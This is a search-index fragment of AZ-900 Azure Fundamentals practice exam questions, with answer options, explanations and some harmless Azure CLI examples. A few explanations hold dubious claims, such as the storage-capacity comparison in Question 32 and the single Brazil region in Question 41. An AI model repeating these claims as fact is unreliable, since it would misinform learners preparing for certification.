                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-6-which-of-the-following-is-not-a-feature-of-azure-functions","title":"Question 6:\u00a0Which of the following is not a feature of Azure Functions?","text":"
                            • Designed for backend batch applications that are continuously running
                            • Can trigger the function based off of Azure events such as a new file being saved to a storage account blob container
                            • Can possibly cost you nothing as there is a generous free tier
                            • Can edit the code right in the Azure Portal using a code editor

                            Explanation: Functions are designed for short pieces of code that start and end quickly. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-functions/

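                            For context, a Function App on the consumption plan only runs (and bills) while a function executes, which is why it suits short, event-driven code rather than continuously running batch jobs. A minimal sketch with the Azure CLI (all resource names are hypothetical):

                            az functionapp create \
                              --resource-group demo-rg \
                              --name demo-func-app \
                              --storage-account demofuncstore \
                              --consumption-plan-location eastus \
                              --runtime python
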
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-7-within-the-context-of-privacy-and-compliance-what-does-the-acronym-iso-stand-for-in-english","title":"Question 7: Within the context of privacy and compliance, what does the acronym ISO stand for, in English?","text":"
                            • Information Systems Officer
                            • Instead of
                            • International Organization for Standardization
                            • Intelligence and Security Office

                            Explanation: ISO is a standards body, International Organization for Standardization. For more info:\u00a0https://www.iso.org/about-us.html

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-8-what-is-the-minimum-charge-for-having-an-azure-account-each-month-even-if-you-dont-use-any-resources","title":"Question 8:\u00a0What is the minimum charge for having an Azure Account each month, even if you don't use any resources?","text":"
                            • $0
                            • $200
                            • $1
                            • Negotiated with your enterprise manager

                            Explanation: An Azure account can cost nothing if you don't use any resources or only use free resources. For more info:\u00a0https://azure.microsoft.com/en-us/pricing/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-9-what-is-a-benefit-of-economies-of-scale","title":"Question 9: What is a benefit of economies of scale?","text":"
                            • Prices of cloud servers and services are always going down. It'll be cheaper next year than it is this year.
                            • Big companies don't need to make a profit on every sale
                            • Big companies don't need to make a profit on the first product they sell you, because they will make a profit on the second
                            • The more you buy of something, the cheaper it is for you

                            Explanation: Economies of Scale - the more of an item that you buy, the cheaper it is per unit. For more info:\u00a0https://docs.microsoft.com/en-us/learn/modules/principles-cloud-computing/3b-economies-of-scale

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-10-application-gateway-contains-what-additional-optional-security-feature-over-a-regular-load-balancer","title":"Question 10:\u00a0Application Gateway contains what additional optional security feature over a regular Load Balancer?","text":"
                            • Azure AD Advanced Information Protection
                            • Multi-Factor Authentication
                            • Web Application Firewall (WAF)
                            • Advanced DDoS Protection

                            Explanation: Application Gateways also comes with an optional Web Application Firewall (or WAF) as a security benefit. For more info:\u00a0https://docs.microsoft.com/en-us/azure/web-application-firewall/ag/ag-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-11-approximately-how-many-regions-does-azure-have-around-the-world","title":"Question 11:\u00a0Approximately how many regions does Azure have around the world?","text":"
                            • 60+
                            • 25
                            • 10
                            • 40

                            Explanation: There are 60+ Azure regions currently, in 10+ geographies. For more info:\u00a0https://docs.microsoft.com/en-us/azure/availability-zones/az-region

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-12-what-does-it-mean-if-a-service-is-in-public-preview-mode","title":"Question 12: What does it mean if a service is in Public Preview mode?","text":"
                            • Anyone can use the service but it must not be for production use
                            • Anyone can use the service for any reason
                            • The service is generally available for use, and Microsoft will provide support for it
                            • You have to apply to get selected in order to use that service

                            Explanation: Public Preview is for anyone to use, but it is not supported nor guaranteed to continue to be available. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/preview-supplemental-terms/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-13-which-of-the-following-cloud-computing-models-requires-the-highest-level-of-involvement-in-maintaining-the-operating-system-and-file-system-by-the-customer","title":"Question 13:\u00a0Which of the following cloud computing models requires the highest level of involvement in maintaining the operating system and file system by the customer?","text":"
                            • IaaS
                            • FaaS
                            • PaaS
                            • SaaS

                            Explanation: IaaS or Infrastructure as a service requires you to keep your OS patched, close ports, and generally protect your own server. For more info:\u00a0https://azure.microsoft.com/en-us/overview/what-is-iaas/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-14-true-or-false-azure-cloud-shell-allows-access-to-the-bash-and-powershell-consoles-in-the-azure-portal","title":"Question 14:\u00a0True or false: Azure Cloud Shell allows access to the Bash and Powershell consoles in the Azure Portal","text":"
                            • FALSE
                            • TRUE

                            Explanation: Cloud Shell - allows access to the Bash and Powershell consoles in the Azure Portal. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cloud-shell/overview

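                            Both consoles drive the same Azure Resource Manager APIs; for example, listing resource groups from Cloud Shell looks like this in either shell:

                            az group list --output table     # Bash console (Azure CLI)
                            Get-AzResourceGroup              # PowerShell console (Az module)
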
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-15-which-of-the-following-elements-is-considered-part-of-the-perimeter-layer-of-security","title":"Question 15:\u00a0Which of the following elements is considered part of the \"perimeter\" layer of security?","text":"
                            • Separate servers into distinct subnets by role
                            • Locks on the data center doors
                            • Keep operating systems up to date with patches
                            • Use a firewall

                            Explanation: Firewall is part of the perimeter security. For more information on the layered approach to network security:\u00a0https://docs.microsoft.com/en-us/learn/modules/intro-to-security-in-azure/5-network-security

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-16-what-is-the-concept-of-paired-regions","title":"Question 16:\u00a0What is the concept of paired regions?","text":"
                            • Azure employees in those regions sometimes go on picnics together.
                            • Each region of the world has one other region, usually in a completely separate country and geography, where it makes the most sense to place your backups. Like East US 2 is paired with South Korea.
                            • When you deploy your code to one region of the world, it is automatically deployed to the paired region as an emergency backup.
                            • Each region in the world has at least one other region in which is shares an extremely high speed connection, and where there is coordinated action by Azure not to do anything that will bring them both down at the same time.

                            Explanation: Paired regions are usually in the same geo (not always) but are the most logical place to store backups because they have a high speed connection and Azure staggers the service updates to those regions. For more info:\u00a0https://docs.microsoft.com/en-us/azure/best-practices-availability-paired-regions

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-17-what-makes-estimating-the-cost-of-an-unmanaged-storage-account-difficult","title":"Question 17:\u00a0What makes estimating the cost of an unmanaged storage account difficult?","text":"
                            • There is no way to predict the amount of data in the account
                            • The cost of storage changes frequently
                            • You are charged for data leaving Azure, and it's difficult to predict that
                            • You are charged for data coming into Azure, and it's difficult to predict that

                            Explanation: There is a cost for egress (bandwidth out) and it's hard to estimate how many bytes will be counted leaving an Azure network. For more info:\u00a0https://azure.microsoft.com/en-us/pricing/details/storage/page-blobs/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-18-why-is-a-user-id-and-password-sometimes-not-enough-to-prove-someone-is-who-they-say-they-are","title":"Question 18:\u00a0Why is a user id and password sometimes not enough to prove someone is who they say they are?","text":"
                            • User id and password can be used by anyone such as a co-worker, ex-employee or hacker half-way around the world
                            • Some people might choose the same user id and password
                            • Passwords must be encrypted before being stored
                            • Passwords are usually easy to forget

                            Explanation: The truth is that someone can find a way to get a user id and password, even guess it, and that can be used by another person. For more information on other ways to prove self-identification such as Multi-Factor Authentication:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-mfa-howitworks

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-19-which-tool-within-azure-is-comprised-of-azure-status-service-health-and-resource-health","title":"Question 19:\u00a0Which tool within Azure is comprised of : Azure Status, Service Health and Resource Health?","text":"
                            • Azure Dashboard
                            • Azure Monitor
                            • Azure Service Health
                            • Azure Advisor

                            Explanation: Azure Service Health - lets you know about any Azure-related service issues including region-wide downtime. For more info:\u00a0https://docs.microsoft.com/en-us/azure/service-health/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-20-which-of-the-following-is-a-good-example-of-a-hybrid-cloud","title":"Question 20:\u00a0Which of the following is a good example of a Hybrid cloud?","text":"
                            • Your users are inside your corporate network but your applications and data are in the cloud.
                            • Your code is a mobile app that runs on iOS and Android phones, but it uses a database in the cloud.
                            • A server runs in your own environment, but places files in the cloud so that it can extend the amount of storage it has access to.
                            • Technology that allows you to grow living tissue on top of an exoskeleton, making Terminators impossible to spot among humans.

                            Explanation: Hybrid Cloud - A mixture between your own private networks and servers, and using the public cloud for some things. Typically used to take advantage of the unlimited, inexpensive growth benefits of the public cloud. For more info:\u00a0https://azure.microsoft.com/en-us/overview/what-is-hybrid-cloud-computing/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-21-where-do-you-go-within-the-azure-portal-to-find-all-of-the-third-party-virtual-machine-and-other-offers","title":"Question 21:\u00a0Where do you go within the Azure Portal to find all of the third-party virtual machine and other offers?","text":"
                            • Azure mobile app
                            • Azure Marketplace
                            • Choose an image when creating a VM
                            • Bing

                            Explanation: Azure Marketplace contains thousands of services you can rent within the cloud. For more info:\u00a0https://azuremarketplace.microsoft.com/en-us

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-22-what-is-the-new-data-privacy-and-information-protection-regulation-that-took-effect-across-europe-in-may-2018","title":"Question 22:\u00a0What is the new data privacy and information protection regulation that took effect across Europe in May 2018?","text":"
                            • FedRAMP
                            • GDPR
                            • ISO 9001:2015
                            • PCI DSS

                            Explanation: The General Data Protection Regulation (GDPR) took effect in Europe in May 2018. For more info:\u00a0https://docs.microsoft.com/en-us/microsoft-365/compliance/gdpr?view=o365-worldwide

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-23-why-is-azure-app-services-considered-platform-as-a-service","title":"Question 23:\u00a0Why is Azure App Services considered Platform as a Service?","text":"
                            • You can decide on what type of virtual machine it runs - A-series, or D-series, or even H-series
                            • You are responsible for keeping the operating system up to date with the latest patches
                            • Azure App Services is not PaaS, it's Software as a Service.
                            • You give Azure the code and configuration, and you have no access to the underlying hardware

                            Explanation: You give Azure the code and configuration, and you have no access to the underlying hardware. For more info:\u00a0https://docs.microsoft.com/en-us/azure/app-service/overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-24-what-two-types-of-ddos-protection-services-does-azure-provide-select-two","title":"Question 24: What two types of DDoS protection services does Azure provide? Select two.","text":"
                            • DDoS\u00a0Premium Protection
                            • DDoS\u00a0Advanced Protection
                            • DDoS Network Protection
                            • DDoS IP Protection

                            Explanation: Azure DDoS Protection offers two types of DDoS protection services:

                            • Network Protection\u00a0protects against volumetric attacks that target the network infrastructure. This type of protection is available for all Azure resources that are deployed in a virtual network.

                            • IP Protection\u00a0protects against volumetric and protocol-based attacks that target specific public IP addresses. This type of protection is available for public IP addresses that are not deployed in a virtual network.

                            For more info:\u00a0https://docs.microsoft.com/en-us/azure/virtual-network/ddos-protection-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-25-what-types-of-files-can-a-content-delivery-network-speed-up-the-delivery-of","title":"Question 25:\u00a0What types of files can a Content Delivery Network speed up the delivery of?","text":"
                            • PDFs
                            • Videos
                            • Images
                            • JavaScript files

                            Explanation: All of them. Any static file that doesn't change. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cdn/cdn-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-26-what-is-the-concept-of-big-data","title":"Question 26:\u00a0What is the concept of Big Data?","text":"
                            • A set of Azure services that allow you to execute code in the cloud but don\u2019t require (or even allow) you to manage the underlying server
                            • A form of artificial intelligence (AI) that allows systems to automatically learn and improve from experience without being explicitly programmed.
                            • A small sensor or other device that constantly sends its status and other data to the cloud
                            • An extremely large set of data that you want to ingest and do analysis on; traditional software like SQL Server cannot handle Big Data as efficiently as specialized products

                            Explanation: Big Data - a set of open source (Apache Hadoop) products that can do analysis on millions and billions of rows of data; current tools like SQL Server are not good for this scale

                            For more info:\u00a0https://docs.microsoft.com/en-us/azure/architecture/guide/architecture-styles/big-data

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-27-select-all-features-part-of-azure-ad","title":"Question 27:\u00a0Select all features part of Azure AD?","text":"
                            • Device Management
                            • Log Alert Rule
                            • Single sign-on
                            • Smart lockout
                            • Custom banned password list

                            Explanation: The Log Alert Rule is not a feature of Azure AD. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-whatis#which-features-work-in-azure-ad

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-28-in-which-us-state-is-the-east-us-2-region","title":"Question 28:\u00a0In which US state is the East US 2 region?","text":"
                            • Iowa
                            • Virginia
                            • Texas
                            • California

                            Explanation: East US 2 is in the Eastern state of Virginia, close to Washington DC. For more info:\u00a0https://azure.microsoft.com/en-us/global-infrastructure/data-residency/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-29-windows-servers-use-remote-desktop-protocol-rdp-in-order-for-administrators-to-get-access-to-manage-the-server-linux-servers-use-ssh-what-is-the-recommendation-for-ensuring-the-security-of-these-protocols","title":"Question 29:\u00a0Windows servers use \"remote desktop protocol\" (RDP) in order for administrators to get access to manage the server. Linux servers use SSH. What is the recommendation for ensuring the security of these protocols?","text":"
                            • Disable RDP access using the Windows Services control panel admin tool
                            • Ensure strong passwords on your Windows admin accounts
                            • Do not enable SSH access for Linux servers
                            • Do not allow public Internet access over the RDP and SSH ports directly to the server. Instead use a secure server like Bastion to control access to the servers behind.

                            Explanation: You need to either control access to the RDP and SSH ports to a very specific range of IPs, enable the ports only when you are using it, or use a Bastion server/jump box to protect those servers. For more info:\u00a0https://docs.microsoft.com/en-us/azure/bastion/bastion-overview

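                            One common mitigation is an NSG rule that blocks the management ports from the internet entirely, leaving Bastion as the only path in. A sketch with the Azure CLI (resource names hypothetical):

                            az network nsg rule create \
                              --resource-group demo-rg --nsg-name demo-nsg \
                              --name deny-mgmt-from-internet --priority 100 \
                              --direction Inbound --access Deny --protocol Tcp \
                              --source-address-prefixes Internet \
                              --destination-port-ranges 22 3389   # SSH and RDP
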
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-30-what-does-arm-stand-for-in-azure","title":"Question 30:\u00a0What does ARM stand for in Azure?","text":"
                            • Account Resource Manager
                            • Availability, Reliability, Maintainability
                            • Advanced RISC Machine
                            • Azure Resource Manager

                            Explanation: Azure Resource Manager (ARM) - this is the common resource deployment model that underlies all resource creation or modification; no matter whether you use the portal, powershell or the SDK, the Azure Resource Manager takes those commands and executes them. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/overview

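                            Whichever tool you use, the request ultimately becomes a deployment handled by ARM; deploying a template from the CLI makes that explicit (resource group and template file name are hypothetical):

                            az deployment group create \
                              --resource-group demo-rg \
                              --template-file azuredeploy.json
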
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-31-in-what-way-does-multi-factor-authentication-increase-the-security-of-a-user-account","title":"Question 31:\u00a0In what way does Multi-Factor Authentication increase the security of a user account?","text":"
                            • It requires the user to possess something like their phone to read an SMS, use a mobile app, or biometric identification.
                            • It requires single sign-on functionality
                            • It doesn't. Multi-Factor Authentication is more about access and authentication than account security.
                            • It requires users to be approved before they can log in for the first time.

                            Explanation: MFA requires that the user have access to their mobile phone for using SMS or an app. For more info:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-mfa-howitworks

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-32-what-is-the-maximum-amount-of-azure-storage-space-a-single-subscription-can-store","title":"Question 32:\u00a0What is the maximum amount of Azure Storage space a single subscription can store?","text":"
                            • 500 GB
                            • Virtually unlimited
                            • 5 PB
                            • 2 TB

                            Explanation: A single Azure subscription can have up to 250 storage accounts per region, and each storage account can store up to 5 Petabytes; that is 1,250 PB (1.25 million TB) per region, or roughly 31 million Terabytes across about 25 regions. This is probably 15-20 times what Google, Amazon, Microsoft and Facebook use combined. That's a lot. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/azure-subscription-service-limits#storage-limits

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-33-how-do-you-get-access-to-services-in-private-preview-mode","title":"Question 33:\u00a0How do you get access to services in Private Preview mode?","text":"
                            • You cannot use private preview services.
                            • They are available in the marketplace. You simply use them.
                            • You must apply to use them.
                            • You must agree to a terms of use first.

                            Explanation: Private Preview means you must apply to use them. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/preview-supplemental-terms/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-34-what-is-the-concept-of-being-able-to-get-your-applications-and-data-running-in-another-environment-quickly","title":"Question 34:\u00a0What is the concept of being able to get your applications and data running in another environment quickly?","text":"
                            • Business Continuity / Disaster Recovery (BC/DR)
                            • Azure Blueprint
                            • Azure Devops
                            • Reproducible deployments

                            Explanation: Disaster Recovery - the ability to recover from a big failure within an acceptable period of time, with an acceptable amount of data lost. For more info on Backup and Disaster Recovery:\u00a0https://azure.microsoft.com/en-us/solutions/backup-and-disaster-recovery/ For more info on Azure\u2019s built-in disaster recovery as a service (DRaaS):\u00a0https://azure.microsoft.com/en-us/services/site-recovery/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-35-which-of-the-following-is-considered-a-downside-to-using-capital-expenditure-capex","title":"Question 35:\u00a0Which of the following is considered a downside to using Capital Expenditure (CapEx)?","text":"
                            • It does not require a lot of up front money
                            • You can deduct expenses as they occur
                            • You are not guaranteed to make a profit
                            • You must wait over a period of years to depreciate that investment on your taxes

                            Explanation: One of the downsides of CapEx is that the money invested cannot be deducted immediately from your taxes. For more info:\u00a0https://docs.microsoft.com/en-us/learn/modules/principles-cloud-computing/3c-capex-vs-opex

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-36-what-azure-resource-allows-you-to-evenly-split-traffic-coming-in-and-direct-it-to-several-identical-virtual-machines-to-do-the-work-and-respond-to-the-request","title":"Question 36:\u00a0What Azure resource allows you to evenly split traffic coming in and direct it to several identical virtual machines to do the work and respond to the request?","text":"
                            • Load Balancer or Application Gateway
                            • Azure Logic Apps
                            • Virtual Network
                            • Azure App Services

                            Explanation: This is the core feature of either a Load Balancer or Application Gateway. For more info:\u00a0https://docs.microsoft.com/en-us/azure/load-balancer/load-balancer-overview

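                            As a rough sketch, creating a basic Layer-4 load balancer with the Azure CLI looks like this (names hypothetical); backend VMs are then added to the backend pool to receive the split traffic:

                            az network lb create \
                              --resource-group demo-rg --name demo-lb --sku Standard \
                              --frontend-ip-name demo-fe --backend-pool-name demo-be
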
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-37-true-or-false-azure-charges-for-bandwidth-used-inbound-to-azure","title":"Question 37:\u00a0True or false: Azure charges for bandwidth used \"inbound\" to Azure","text":"
                            • FALSE
                            • TRUE

                            Explanation: Ingress bandwidth is free. You pay for egress (outbound). For more info:\u00a0https://azure.microsoft.com/en-us/pricing/details/bandwidth/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-38-which-free-azure-security-service-checks-all-traffic-travelling-over-a-subnet-against-a-set-of-rules-before-allowing-it-in-or-out","title":"Question 38:\u00a0Which free Azure security service checks all traffic travelling over a subnet against a set of rules before allowing it in, or out.","text":"
                            • Network Security Group
                            • Advanced Threat Protection (ARP)
                            • Azure Firewall
                            • Azure DDoS Protection

                            Explanation: Network Security Group (NSG) - a fairly basic set of rules that you can apply to both inbound traffic and outbound traffic that lets you specify what sources, destinations and ports are allowed to travel through from outside the virtual network to inside the virtual network. For more info:\u00a0https://docs.microsoft.com/en-us/azure/virtual-network/security-overview

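                            An NSG only takes effect once it is associated with a subnet (or a NIC). A minimal sketch, assuming an existing virtual network (names hypothetical):

                            az network nsg create --resource-group demo-rg --name demo-nsg
                            az network vnet subnet update \
                              --resource-group demo-rg --vnet-name demo-vnet \
                              --name demo-subnet --network-security-group demo-nsg
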
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-39-what-is-the-concept-of-availability","title":"Question 39:\u00a0What is the concept of Availability?","text":"
                            • A system must have 100% uptime to be considered available
                            • A system that can scale up and scale down depending on customer demand
                            • The percentage of time a system responds properly to requests, expressed as a percentage over time
                            • A system that has a single point of failure

                            Explanation: Availability - what percentage of time does a system respond properly to requests, expressed as a percentage over time. For more information on region and availability zones see:\u00a0https://docs.microsoft.com/en-us/azure/availability-zones/az-overview. For more information on availability options for virtual machines see:\u00a0https://docs.microsoft.com/en-us/azure/virtual-machines/availability.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-40-what-is-the-benefit-of-using-powershell-over-cli","title":"Question 40:\u00a0What is the benefit of using Powershell over CLI?","text":"
                            • More powerful commands
                            • Quicker to deploy VMs
                            • Cheaper
                            • No benefit, it's the same

                            Explanation: There is no benefit, only a matter of personal choice. For more info on Azure CLI:\u00a0https://docs.microsoft.com/en-us/cli/azure/what-is-azure-cli?view=azure-cli-latest. For more info on Azure Powershell:\u00a0https://docs.microsoft.com/en-us/powershell/azure/?view=azps-4.5.0

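                            The two tools are functionally equivalent; the same resource group creation looks like this in each (names hypothetical):

                            az group create --name demo-rg --location eastus       # Azure CLI
                            New-AzResourceGroup -Name demo-rg -Location eastus     # Azure PowerShell
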
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-41-how-many-regions-does-azure-have-in-brazil","title":"Question 41:\u00a0How many regions does Azure have in Brazil?","text":"
                            • 2
                            • 0
                            • 1
                            • 4

                            Explanation: There is 1 region in Brazil. For more info:\u00a0https://azure.microsoft.com/en-us/global-infrastructure/geographies/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-42-what-azure-product-allows-you-to-autoscale-virtual-machines-from-1-to-1000-instances-and-also-provides-load-balancing-services-built-in","title":"Question 42:\u00a0What Azure product allows you to autoscale virtual machines from 1 to 1000 instances, and also provides load balancing services built in?","text":"
                            • Virtual Machine Scale Sets
                            • Azure App Services
                            • Azure Virtual Machines
                            • Application Gateway

                            Explanation: Virtual Machine Scale Sets - these are a set of identical virtual machines (from 1 to 1000 instances) that are designed to auto-scale up and down based on user demand. For more info:\u00a0https://azure.microsoft.com/en-us/services/virtual-machine-scale-sets/

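                            A scale set is created much like a single VM, plus an instance count; autoscale rules can then grow or shrink it on demand. A sketch (resource names and the image alias are assumptions):

                            az vmss create \
                              --resource-group demo-rg --name demo-vmss \
                              --image Ubuntu2204 --instance-count 3 \
                              --vm-sku Standard_B2s \
                              --admin-username azureuser --generate-ssh-keys
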
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-43-what-does-it-mean-if-a-service-is-in-general-availability-ga-mode","title":"Question 43: What does it mean if a service is in General Availability (GA) mode?","text":"
                            • Anyone can use the service for any reason
                            • You have to apply to get selected in order to use that service
                            • Anyone can use the service but it must not be for production use
                            • The service has now reached public preview, and Microsoft will provide support for it

                            Explanation: Anyone can use a GA service. It is fully supported and can be used for production. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/preview-supplemental-terms/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-44-each-person-has-their-own-user-id-and-password-to-log-into-azure-but-how-many-subscriptions-can-a-single-account-be-associated-with","title":"Question 44:\u00a0Each person has their own user id and password to log into Azure. But how many subscriptions can a single account be associated with?","text":"
                            • 10
                            • 250 per region
                            • No limit
                            • One

                            Explanation: There is no limit to the number of subscriptions a single user account can be associated with.

                            For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/azure-subscription-service-limits

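                            You can see every subscription your account is associated with, and switch the active one, from the CLI (the subscription name below is a placeholder):

                            az account list --output table            # all subscriptions visible to this account
                            az account set --subscription "Demo Sub"  # switch the active subscription
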
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-45-what-is-the-azure-sla-for-two-or-more-virtual-machines-in-an-availability-set","title":"Question 45:\u00a0What is the Azure SLA for two or more Virtual Machines in an Availability Set?","text":"
                            • 100%
                            • 99.90%
                            • 99.99%
                            • 99.95%

                            Explanation: 99.95% For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/sla/virtual-machines/v1_9/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-46-which-azure-service-is-the-recommended-identity-as-a-service-offering-inside-azure","title":"Question 46:\u00a0Which Azure service is the recommended Identity-as-a-Service offering inside Azure?","text":"
                            • Azure Active Directory (AD)
                            • Azure Portal
                            • Identity and Access Management (IAM)
                            • Azure Front Door

                            Explanation: Azure AD is the identity service designed for web protocols, that you can use for your applications. For more info:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-whatis

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-47-what-is-the-benefit-of-using-a-command-line-tool-like-powershell-or-cli-as-opposed-to-the-azure-portal","title":"Question 47:\u00a0What is the benefit of using a command line tool like Powershell or CLI as opposed to the Azure portal?","text":"
                            • Quicker to deploy VMs
                            • Cheaper
                            • Automation

                            Explanation: The real benefit is automation. Being able to write a script to do something is better than having to do it manually each time. For more info on Azure CLI:\u00a0https://docs.microsoft.com/en-us/cli/azure/what-is-azure-cli?view=azure-cli-latest. For more info on Azure Powershell:\u00a0https://docs.microsoft.com/en-us/powershell/azure/?view=azps-4.5.0

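                            Automation is the difference between clicking through the portal three times and running one repeatable script; for example (resource names hypothetical):

                            # create identically configured resource groups for each environment
                            for env in dev test prod; do
                              az group create --name "demo-rg-$env" --location eastus
                            done
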
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-48-what-database-service-is-specifically-designed-to-be-extremely-fast-in-responding-to-requests-for-small-amounts-of-data-called-low-latency","title":"Question 48:\u00a0What database service is specifically designed to be extremely fast in responding to requests for small amounts of data (called low latency)?","text":"
                            • SQL Database
                            • SQL Data Warehouse
                            • Cosmos DB
                            • SQL Server in a VM

                            Explanation: Cosmos DB - extremely low latency (fast) storage designed for smaller pieces of data quickly; SaaS. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cosmos-db/

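                            Creating a Cosmos DB account from the CLI is one line; the consistency level is the main knob trading latency against consistency (names hypothetical):

                            az cosmosdb create \
                              --resource-group demo-rg --name demo-cosmos-acct \
                              --default-consistency-level Session
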
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-49-if-you-are-a-us-federal-state-local-or-tribal-government-entities-and-their-solution-providers-which-azure-option-should-you-be-looking-to-register-for","title":"Question 49: If you are a US federal, state, local, or tribal government entities and their solution providers, which Azure option should you be looking to register for?","text":"
                            • Azure is not available for government officials
                            • Azure Government
                            • Azure Department of Defence
                            • Azure Public Portal

                            Explanation: US federal, state, local, and tribal government entities, and their solution providers, should register for Azure Government. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-government/documentation-government-welcome

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-50-what-is-the-service-level-agreement-for-two-or-more-azure-virtual-machines-that-have-been-manually-placed-into-different-availability-zones-in-the-same-region","title":"Question 50:\u00a0What is the service level agreement for two or more Azure Virtual Machines that have been manually placed into different Availability Zones in the same region?","text":"
                            • 99.95%
                            • 99.90%
                            • 99.99%
                            • 100%

                            Explanation: 99.99%. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/sla/virtual-machines/v1_9/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#test-3","title":"Test 3","text":"","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-1-what-is-the-significance-of-the-azure-region-why-is-it-important","title":"Question 1:\u00a0What is the significance of the Azure region? Why is it important?","text":"
                            • You must select a region when creating most resources, and the region is the area of the world where those resources will be physically located.
                            • Once you select a region, you cannot create resources outside of that region. So selecting the right region is an important decision.
                            • Region is just a folder structure in which you organize resources, much like file folders on a computer.
                            • Even though you have to choose a region when creating resources, there's generally no consequence to what you select. You can create a network in one region and then create virtual machines for that network in another region.

                            Explanation: The region is the area of the world where resources get created. You can create resources in any region that you have access to, but there are sometimes restrictions: when you create a resource in one region, related resources such as networks must also be in the same region for logical reasons. For more info:\u00a0https://azure.microsoft.com/en-us/global-infrastructure/geographies/#overview

